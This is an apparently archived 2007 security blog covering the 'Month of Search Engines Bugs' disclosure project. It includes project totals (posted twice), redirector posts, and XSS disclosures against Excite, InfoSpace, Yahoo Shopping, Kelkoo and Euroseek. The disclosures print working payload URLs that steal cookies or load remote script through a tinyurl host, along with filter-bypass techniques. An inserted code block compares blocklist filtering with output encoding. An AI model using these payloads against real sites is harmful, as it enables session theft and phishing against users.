Archive for the 'MOSEB' category

Month of Search Engines Bugs: totals

23:57 01.07.2007

My project Month of Search Engines Bugs has finished and I’m summing up.

33 search engines (30 web engines and 3 local engines) from 19 vendors took part in the project; some vendors have several engines. The list of the project's participants (in order of appearance): Meta, Yahoo, HotBot, Gigablast, MSN, Clusty, Yandex, Yandex.Server (local engine), Search Europe, Rambler, Ask.com, Ezilon, AltaVista, AltaVista local (local engine), MetaCrawler, Mamma, Google, Google Custom Search Engine (local engine), My Way, Lycos, Aport, Netscape Search, WebCrawler, Dogpile, AOL Search, My Search, My Web Search, LookSmart, DMOZ (Open Directory Project), InfoSpace, Euroseek, Kelkoo, Excite.

Altogether 104 vulnerabilities were published in the mentioned engines, including Cross-Site Scripting (both XSS and HTML Injection), Full path disclosure, Content Spoofing and Information disclosure vulnerabilities. This does not count redirectors in search engines (altogether 23 redirectors were published).

Results of the project: 44 of 104 vulnerabilities were fixed (not counting redirectors). That is 42.31% fixed vulnerabilities. Owners of search engines still have room to improve the security of their engines.

Note that of all the search engine vendors only two thanked me (out of 19 vendors of 33 search engines) for the time I spent on them, for searching for vulnerabilities in their systems and for helping to improve the security of their engines (these were Rambler and Ezilon). All the other owners of search engines did not even think (were too lazy) to do that. That is very unethical on their part, and they need to work on their ethics and culture.

As I wrote in the project description, I decided to determine the winners of Month of Search Engines Bugs in two nominations. During the project every visitor of the site could vote for the bug he liked by posting a comment in the corresponding post. Today I counted the visitors' votes and I am announcing the winners.

Results of voting:

Best bug of MOSEB MustLive Choice

Also pay attention to MOSEB-05 Bonus: Vulnerabilities at autos.msn.com; in both of these MSN vulnerabilities the attack is based on the Expressive comments space-hack filters bypass technique.

Best bug of MOSEB Visitors Choice

It is an interesting vulnerability; besides, it is the most dangerous bug of MOSEB.

The list of TOP5 bugs of MOSEB (by visitors choice):

  1. MOSEB-20 Bonus: Google dorks strikes back
  2. MOSEB-06: Vulnerabilities at clusty.com
  3. MOSEB-05: Vulnerability at shopping.msn.com
  4. MOSEB-15: Vulnerabilities at images.google.com
  5. MOSEB-10: Vulnerabilities at www.ask.com

I congratulate the winners, Microsoft and Google! You make the best vulnerabilities in your engines ;-) . Other search engine developers need to learn from you. But all vendors need to work on improving the security of their engines.

Thanks for watching the MOSEB project. Best regards. And attend to your security.

P.S.

By the way, before conducting this project (MOSEB), I conducted one more interesting project on disclosing vulnerabilities at important sites. In January I conducted the presidents fiesta: I published holes in the sites of presidents :-) (of course I informed the administrations of these sites about the vulnerabilities).

You can acquaint yourself with them as well.

Month of Search Engines Bugs: totals

23:24 01.07.2007

My project Month of Search Engines Bugs has finished and I am summing up.

33 search engines (30 web engines and 3 local engines) from 19 vendors took part in the project; some vendors own several engines. The list of the project's participants (in order of appearance): Meta, Yahoo, HotBot, Gigablast, MSN, Clusty, Yandex, Yandex.Server (local engine), Search Europe, Rambler, Ask.com, Ezilon, AltaVista, AltaVista local (local engine), MetaCrawler, Mamma, Google, Google Custom Search Engine (local engine), My Way, Lycos, Aport, Netscape Search, WebCrawler, Dogpile, AOL Search, My Search, My Web Search, LookSmart, DMOZ (Open Directory Project), InfoSpace, Euroseek, Kelkoo, Excite.

Altogether 104 vulnerabilities were published in the mentioned engines, including Cross-Site Scripting (both XSS and HTML Injection), Full path disclosure, Content Spoofing and Information disclosure vulnerabilities. This does not count redirectors in search engines (altogether 23 redirectors were published).

Results of the project: 44 of 104 vulnerabilities were fixed (not counting redirectors). That is 42.31% fixed vulnerabilities. Owners of search engines still have room to improve the security of their engines.

Note that of all the search engine vendors only two thanked me (out of 19 vendors of 33 search engines) for the time I spent on them, for searching for vulnerabilities in their systems and for helping to improve the security of their engines (these were Rambler and Ezilon). All the other owners of search engines did not even think (were too lazy) to do that. That is very unethical on their part, and they still need to work on their ethics and culture.

As I wrote in the project description, I decided to determine the winners of Month of Search Engines Bugs in two nominations. During the project every visitor of the site could vote for the bug they liked by leaving a comment in the corresponding post. Today I counted the visitors' votes and I am announcing the winners.

Results of voting:

Best bug of MOSEB MustLive Choice

Also pay attention to MOSEB-05 Bonus: Vulnerabilities at autos.msn.com; in both of these MSN vulnerabilities the attack is based on the Expressive comments space-hack filters bypass technique.

Best bug of MOSEB Visitors Choice

It is an interesting vulnerability; besides, it is the most dangerous bug of MOSEB.

The list of TOP5 bugs of MOSEB (by visitors' choice):

  1. MOSEB-20 Bonus: Google dorks strikes back
  2. MOSEB-06: Vulnerabilities at clusty.com
  3. MOSEB-05: Vulnerability at shopping.msn.com
  4. MOSEB-15: Vulnerabilities at images.google.com
  5. MOSEB-10: Vulnerabilities at www.ask.com

I congratulate the winners, Microsoft and Google! You make the best vulnerabilities in your engines ;-) . Other search engine developers still need to learn from you. But all vendors still need to work on improving the security of their engines.

Thanks for following the MOSEB project. All the best. And pay attention to your security.

P.S.

By the way, before this project (MOSEB), I conducted one more interesting project on disclosing vulnerabilities at important sites. In January I conducted the presidents fiesta: I published holes in the sites of presidents :-) (of course I informed the administrations of these sites about the vulnerabilities).

You can also acquaint yourself with them.

MOSEB-30 Bonus: Redirectors #2

22:45 30.06.2007

New bonus vulnerabilities in MOSEB. Today is the day of redirectors, as I wrote in MOSEB-30: Redirectors #1, and I continue to show you redirector holes in search engines.

The list of redirectors in search engines (part 2).

MSN:

Meta:

Aport:

AOL Search:

Netscape Search:

MetaCrawler:

InfoSpace:

About Google's redirectors.

I wrote about three of Google's redirectors in MOSEB-30 and said that the first one was already fixed.

This redirector hole worked some time ago, but after the security community drew Google's attention to the issue, they added protection for this hole (a redirect notice page). But Google fixed it poorly, so it is possible to bypass this protection.

You just need to make a working link (with the necessary hash) and the redirector will work :-) . But this hash is temporary, so you need to update it periodically to a fresh one.

Or you can use another redirector from Google (it is another version of the first redirector, with a constant hash):

Moral: clicking on redirecting links can be dangerous.

P.S.

Tomorrow I will total the project's results. I will also count up the votes for all the bugs and find out the best bug of MOSEB. So if you have not voted for the bugs yet (in the comments), you can do it now, and tomorrow you will see the results.

MOSEB-30: Redirectors #1

19:32 30.06.2007

As I wrote in the project description, I planned a surprise for you on the 30th day of Month of Search Engines Bugs. And today is the day of redirectors.

I wrote about redirectors in my article Redirectors in May (and listed some redirectors in that article). So for detailed information read that article (if you are familiar with Ukrainian, and you should be, if you do not want to miss all the interesting things), and now I will say a few words about this issue.

In short: redirectors are bad, because they can be used by bad guys for malicious purposes (like phishing). So redirectors must be fixed, so that they do not allow blind redirecting. This is a serious problem which has not yet received attention from search engine vendors and web developers (only Google fixed one of its many redirectors, and fixed it poorly). So I am trying to draw the attention of engine vendors and the Internet community to this issue: I have already written about them on my site several times, and I decided to dedicate one day of MOSEB to redirectors.

The list of redirectors in search engines (part 1).

Google:

Yahoo:

Ask.com:

Yandex:

Rambler:

Excite:

Webcrawler:

Moral: redirectors can be dangerous.

P.S.

In the bonus post I will write about redirector holes in other search engines and show you how to bypass Google's protection for their first redirector. So wait for today's bonus post ;-) .

MOSEB-29 Bonus: Vulnerabilities in Excite White Pages

22:32 29.06.2007

New bonus vulnerabilities in Excite. In this case the vulnerabilities are at a different domain than in MOSEB-29: Vulnerability at money.excite.com.

The vulnerability is at Excite White Pages (kevdb.infospace.com), which is located on a server of InfoSpace (Excite's partner). I found these Cross-Site Scripting holes on 31.05.2007.

XSS:

The vulnerabilities are in the qn, qf and qc parameters:
http://kevdb.infospace.com/info.xcite/wp/results/kevdb?OTMPL=%2Fwp%2Fresults.htm&QN=%3Cscript%20src=%22http://tinyurl.com/2tkq8d%22%3E%3C/script%3E&KCFG=US

Moral: seeking in white pages can be dangerous.

Note that the Excite engine belongs to IAC Search & Media, so Ask.com is also responsible for these vulnerabilities.

Also note that the Excite White Pages engine uses the InfoSpace engine, so InfoSpace is also responsible for these vulnerabilities.

MOSEB-29: Vulnerability at money.excite.com

19:48 29.06.2007

The next participant of the project is the Excite search engine. It is one of the popular meta search engines (in the USA).

The vulnerability is at Excite Money & Investing (money.excite.com) in the symbol search results. I found this Cross-Site Scripting hole on 31.05.2007. I used the null byte filter bypass technique for Mozilla and the slash filter bypass technique for Internet Explorer.

XSS:

The vulnerability is in the symbol_search_text parameter:
http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=%3Cscript%00src=%22http://tinyurl.com/2tkq8d%22%3E%3C/script%3E

Also, the page with the HTML injection hole has PR7. It is a dream, and black SEO guys will be happy :-) .

Moral: searching for money can be dangerous.

Note that the Excite engine belongs to IAC Search & Media, so Ask.com is also responsible for this vulnerability.

P.S.

I have also prepared other holes concerning Excite. So wait for today's bonus post ;-) .

MOSEB-28 Bonus: Vulnerability at shopping.yahoo.com

22:42 28.06.2007

New bonus vulnerability in MOSEB. This time the vulnerability is at Yahoo! Shopping. As I wrote in MOSEB-28, Kelkoo belongs to Yahoo (and is used as a part of Yahoo! Shopping), so I decided to write about a hole at shopping.yahoo.com (which is related to the Kelkoo engine described in MOSEB-28: Vulnerabilities in Kelkoo). This is a new vulnerability in Yahoo, after MOSEB-02.

The vulnerability is at Yahoo! Shopping (shopping.yahoo.com) in the Abuse Report. I found this Cross-Site Scripting hole on 24.06.2007 and it works in Internet Explorer. It is a very cute hole: to bypass the filters I used the variable-width encoding with expression technique.

XSS:

The vulnerability is in the review_excerpt and review_title parameters:
http://shopping.yahoo.com/merchrating/abuse_report.html;_ylu=?message_id=scd-337&merchant_id=1002688&review_excerpt=style%3Dxss:expression(alert(document.cookie))%20%C0&review_title=%C0

Moral: writing reports to search engine vendors can be dangerous.

MOSEB-28: Vulnerabilities in Kelkoo

20:34 28.06.2007

The next participant of the project is the Kelkoo search engine. It is one of the popular shopping search engines (and it now belongs to Yahoo and is a part of Yahoo! Shopping).

The vulnerabilities are at two Kelkoo domains (books.kelkoo.co.uk and fr.kelkoo.be) in the books comparison and the digital cameras comparison. I found these Cross-Site Scripting holes on 27.05.2007 (at books.kelkoo.co.uk) and 25.06.2007 (at fr.kelkoo.be); both are DOM Based XSS (pretty ones).

XSS in DOM:

The vulnerability is in the isbn parameter:
http://books.kelkoo.co.uk/ctl/do/compare?from=shopbot&catPath=uk%2Fbooks&catId=100801&isbn=%27==%27%27){;}}alert(document.cookie);function%20a(myisbn){if(%27

There is only one catch with it (as with Microsoft at MOSEB-05 and Rambler at MOSEB-09): Kelkoo fixed this vulnerability before this official disclosure. When I checked this hole four days ago, I found that they had fixed it (it was planned for MOSEB). It was a bad move on their part to fix this vuln untimely (because when you are in the project, holes need to be fixed in time). But I found another hole at Kelkoo, which I present to you. Kelkoo and Yahoo (and other vendors) need to understand that they cannot escape from me and my project :-) .

XSS in DOM:

The vulnerability is in the pids parameter:
http://fr.kelkoo.be/ctl/do/compareProducts?catId=124901&pids=%22');alert(document.cookie);//
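As an added example (not code from the posts or from any of the vendors), here is why a blocklist filter misses the null-byte and slash spellings used against money.excite.com in MOSEB-29, and the contextual output encoding for the HTML context and for the inline-script context (where the Kelkoo isbn and pids parameters above land) that removes the need for such a filter. The render functions and the sample values are constructed.

```javascript
// Added example (not from the MOSEB posts): a blocklist filter versus
// contextual output encoding. The sample values are constructed from the
// spellings the posts describe; the render functions are hypothetical.

// Naive server-side filter: recognises only the exact "<script src" spelling.
function naiveFilterBlocks(input) {
  return /<script\s+src/i.test(input);
}

// HTML body/attribute context (money.excite.com, euroseek.com style):
// encode the five significant characters so the browser shows them as text.
function encodeForHtml(s) {
  return s.replace(/[&<>"']/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' }[c]));
}

// JavaScript string context (the Kelkoo isbn/pids values are written into an
// inline script): JSON-encode, then escape "<", ">" and U+2028/U+2029 so the
// value can neither close the string literal nor close the </script> tag.
function encodeForJsString(s) {
  return JSON.stringify(s)
    .replace(/</g, '\\u003c').replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028').replace(/\u2029/g, '\\u2029');
}

// Constructed samples: the plain spelling and the two variants from MOSEB-29.
const SAMPLES = {
  plain:    '<script src="http://example.invalid/x.js"></script>',
  nullByte: '<script\u0000src="http://example.invalid/x.js"></script>', // NUL instead of space
  slash:    '<script/src="http://example.invalid/x.js"></script>',      // slash instead of space
};

// Rendering behind the filter: the variant spellings reach the page unchanged.
function renderWithFilter(value) {
  return naiveFilterBlocks(value) ? '' : `<p>${value}</p>`;
}

// Rendering with encoding: no "<" survives, whatever the spelling.
function renderEncoded(value) {
  return `<p>${encodeForHtml(value)}</p>`;
}

// Inline-script rendering for a parameter such as isbn.
function renderScript(value) {
  return `<script>var isbn = ${encodeForJsString(value)};</script>`;
}
```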

Moral: searching for shopping can be risky.

Note that the Kelkoo engine belongs to Yahoo! Inc., so Yahoo is also responsible for these vulnerabilities.

P.S.

I have also prepared another hole concerning Kelkoo and Yahoo. So wait for today's bonus post ;-) .

MOSEB-27: Vulnerability at euroseek.com

21:54 27.06.2007

The next participant of the project is the Euroseek search engine. Euroseek is a regional search portal designed to find information in Europe.

The vulnerability is at Euroseek (euroseek.com) in the search results. I found this Cross-Site Scripting hole on 30.05.2007.

XSS:

The vulnerability is in the language parameter:
http://euroseek.com/system/search.cgi?mode=internet&language=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Moral: regional seeking can be dangerous.

Note that the Euroseek engine uses the Google search engine, so Google is also responsible for this vulnerability.

MOSEB-26 Bonus: Vulnerability at ypng.infospace.com

22:31 26.06.2007

New bonus vulnerability in InfoSpace. In this case the vulnerability is at a different domain than in MOSEB-26: Vulnerabilities at www.infospace.com.

The vulnerability is at InfoSpace (ypng.infospace.com) in the Yellow Pages search. I found this Cross-Site Scripting hole on 27.05.2007.

XSS:

The vulnerability is in the qa parameter:
http://ypng.infospace.com/home/yellow-pages/redir.htm?fromform=near&qa=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Moral: searching in yellow pages can be dangerous.